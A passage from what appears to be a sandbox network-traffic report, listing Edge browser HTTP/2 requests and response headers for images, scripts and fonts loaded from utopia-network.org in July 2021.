                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 309
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/button__ellipse.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/button__ellipse.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 49370
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/main-screen__video-plug.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/main-screen__video-plug.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 199844
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/title_right.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/title_right.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 23128
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_1.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_1.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: none
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 22920
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_2.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_2.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 22133
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_3.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_3.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 25771
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_4.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_4.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 20185
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_5.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_5.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 19459
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_6.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_6.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 41986
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__bg_top.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__bg_top.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 22253
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__img_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__img_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 64776
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 19587
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/channel__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/channel__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 80274
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/channel__img_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/channel__img_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 30386
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/anonymously__img_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/anonymously__img_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 20315
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__title_end.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__title_end.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 86304
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/anonymously__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/anonymously__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 2057
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/tabs__crypton.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/tabs__crypton.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 640
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/js/scripts.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /js/scripts.min.js HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 21 May 2021 21:39:46 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 177
                                                                                          content-type: application/javascript
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/api__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/api__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 29018
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/js/preloader.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /js/preloader.js HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Tue, 04 May 2021 10:33:58 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-type: application/javascript
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-Medium.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-Medium.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 90268
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-Regular.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-Regular.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 90756
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-SemiBold.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-SemiBold.woff HTTP/2.0
